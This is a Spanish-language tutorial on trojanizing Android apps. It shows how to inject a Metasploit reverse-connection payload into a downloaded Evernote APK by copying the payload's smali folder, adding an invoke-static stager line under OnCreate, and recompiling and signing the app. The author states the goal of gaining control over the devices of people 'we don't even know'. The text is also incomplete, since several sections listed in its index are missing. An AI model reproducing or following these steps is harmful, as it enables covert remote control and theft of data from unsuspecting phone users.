Troyanizadodeapk
Troyanizadodeapk
Troyanizadodeapk
Aka: Hackmaister
ÍNDICE
APK’S TROYANIZADAS...................................................................................................................3
SEGURIDAD DE LAS APLICACIONES..........................................................................................3
HISOTIA DE ANDROID.....................................................................................................................3
EL MERCADO DE LAS APLICACIONES........................................................................................4
ELEMENTOS DE UNA APLICACIÓN TROYANIZADA................................................................4
DECOMPILAR UNA APLICACIÓN..................................................................................................6
INYECTAR UNA APLICACIÓN........................................................................................................6
RECOMPILADO DE LA APLICACIÓN............................................................................................6
FIRMADO DE LA APLICACIÓN MALICIOSA...............................................................................6
CREACIÓN DE LA APLICACIÓN MALICIOSA.............................................................................7
ENTORNOS DE ACTUACIÓN..........................................................................................................7
PREPARANDO APK EASY TOOL....................................................................................................7
OBTENCIÓN DE LA APLICACIÓN ORIGINAL.............................................................................8
DECOMPILADO DE LA APLICACIÓN ORIGINAL.......................................................................8
CREACIÓN DE LA APLICACIÓN MALICIOSA...........................................................................12
DECOMPILADO DE LA APLICACIÓN MALICIOSA..................................................................13
TROYANIZADO DE LA APLICACIÓN ORIGINAL CON LA MALICIOSA...............................15
COMPILACIÓN DE LA APLICACIÓN MALICIOSA....................................................................25
RESULTADO DE LA APLICACION................................................................................................26
APK’S TROYANIZADAS
HISOTIA DE ANDROID
En octubre de 2008 se lanzaba el primer dispositivo que incluía el sistema operativo Android, este
dispositivo era el HTC Dream que fué lanzado en primicia mundial en los Estados Unidos.
Android en sus origines era un concepto muy grande que se fué perfilando en el transcurso de los
años siguientes hasta llegar al nivel de dispositivos que existen hoy en día y siendo esto en gran
medida posible a la evolución de los elementos hardware destinados a dispositivos móviles
inteligentes.
Hoy en día podemos catalogar Android tál y cómo un ordenador de bolsillo capaz de emular
terminales de comandos basados en bash dado que el sistema operativo está basado en el núcleo de
Linux. Pero no solo esto, Android nos permite llevar editores de texto, reproductor de música,
cámara de fotos de altas prestaciones, navegador de internet y una larga lista de aplicativos que
unifican los dispositivos portátiles actuales a pequeños ordenadores de bolsillo como pueden ser las
Rapberry pi o la Orange pi entre muchas placas de desarrollo.
Claramente Android responde a las necesidades de los tiempos actuales y apesar de que cada vez
menos se siguen usando las redes de datos de voz para llevar a cabo llamadas también permiten
estas comunicaciones.
Desde la tecnología GSM hasta el 4G de hoy en día estas bandas han evolucionado a niveles
insospechados siendo a día de hoy el estandar la tecnoloǵia 4G capaz de transmitir voz y datos a la
vez tál y cómo se logró con los routers ADSL de hace unos años.
El grueso de las empresas en vistas del movimiento de sus usuarios en el mercado móvil destinan
grandes cantidades de dinero a estar presentes en el mercado de las aplicaciones para Android dado
que uno de estos terminales está en el bolsillo de 6 de cada 10 personas en el mundo siendo
fundamental no perder cuota de mercado e incluso añadiendo usuarios nuevos al sistema Android
solo para poder usar aplicaciones como Facebook, Instagram, Whatsapp, Telegram y muchas más
aplicaciones que marcan tendencias entre la sociedad en la vivimos.
Entoces según estos datos estamos ante la vertiente más fácil de inyección para lograr ganar el
acceso a dispositivos de gente que ni conocemos sólo con destinar un poco de esfuerzo al
aprendizaje de inyección de payloads dentro de estas aplicaciones.
Consiste en incluir el código que permitirá crear una aplicación maliciosa para obtener el control de
un atacante sobre su víctima.
RECOMPILADO DE LA APLICACIÓN
Este proceso es crucial y depende directamente del proceso de inyectado dado que si cometemos
errores en la inyección este paso va a fallar y muchas veces no solo no se establecerá la conexión
con la víctima, si no que el proceso de recompilado núnca será satisfactorio.
Para este proceso lo más sencillo es utilizar MSFVENOM que viene preinstalado en distribuciones
DEBIAN tales cómo Kali Linux o Parrot OS. Este proceso requiere de asignar correctamente la
dirección ip del atacante el puerto que escuchará la conexión y el tipo de payload apropiado tál y
cómo veremos más adelante.
ENTORNOS DE ACTUACIÓN
Para esta guía se va a utilizar Kali Linux 2018.2 y Window 7 con la aplicación APK EASY TOOL
que es una jollita para este trabajo de inyección tanto por su sencillez cómo por el auto firmado de
la aplicación recompilada.
Además es recomendable un editor de textos al estilo de notepad ++ para trabajar los diferentes
archivos que encontraremos al decompilar las aplicaciones.
La primera vez que abrimos la aplicación se debe indicar la versión de apktool que se va a utilizar
seleccionando entre las disponibles, en la mayoría de las ocasiones sólo habrá una opción en el
desplegable, en caso contrario se debe seleccionar la mayor versión posible.
OBTENCIÓN DE LA APLICACIÓN ORIGINAL
Para obtener la aplicación original se debe descargar desde internet, en esta práctica se procederá a
usar la última versión de Evernote alojada en apkmirror.com ha día 19-03-2018
https://www.apkmirror.com/apk/evernote-corporation/evernote/evernote-7-17-1-release/evernote-
stay-organized-7-17-1-android-apk-download/
Se lanzará el proceso.
El proceso es el mismo que la aplicación original pero mucho más rápido debido al tamaño de la
aplicación.
TROYANIZADO DE LA APLICACIÓN ORIGINAL CON LA
MALICIOSA
Lo primero que se debe tener encuenta es que se va a realizar un injerto de la conexión reversa
perteneciente a la aplicación maliciosa dentro de la aplicación original, después añadiremos el
proceso a un método OnCreate que es el que llama a todas las dependecias de la clase de la carpeta
metasploit para que la conexión se realice de manera satisfactoria.
Para ello dentro de la carpeta de la aplicación maliciosa nos dirigiremos a la carpeta smaili que
alojará la carpeta com la cúal contendrá una carpeta llamada metasploit. Copiaremos esta carpeta y
la insertaremos dentro la aplicación original en la carpeta smali y dentro de esta en com.
• Dentro de la carpeta com existe una que se llama Evernote.(El core de la aplicación).
• Dentro de esta carpeta llamada Evernote es recomendable realizar una búsqueda de ficheros
que contengan el String Activity.
• En este caso ninguno de esto métodos es válido y el apropiado es Evernote.smali.
Este fichero es el apropiado debido a que cumple dos requisitos que deben ser cumplidos siempre:
• Posee el método OnCreate.
• Dentro del método Oncreate existe una línea que comienza por: invoke-super {p0} ,
debajo de la cúal pegaremos es stager de la conexión reversa de metasploit:
invoke-static {p0}, ……………………………………………………..)V
Lcom/metasploit/stage/Payload;→start(Landroid/content/Context;)V
Se debe editar el archivo Evernote.smali y buscar en él strig OnCreate
Para que la inyección sea válida debemos de buscar dentro del método OnCreate una línea que
empieze por invoke-super {p0} , ; y debajo de esta se añadirá :
invoke-static {p0}, Lcom/metasploit/stage/Payload;→start(Landroid/content/Context;)V
COMPILACIÓN DE LA APLICACIÓN MALICIOSA
A la hora de compilar la aplicación se debe tener en cuenta que la opción Sign APK after compile
(Overwrite) debe estar activa para que no genere errores en el momento de su instalación. Además
se debe seleccionar la carpeta en la que hemos trabajado para indicar que debe compilar todos esos
archivos y generar la aplicación maliciosa a partir de ellos.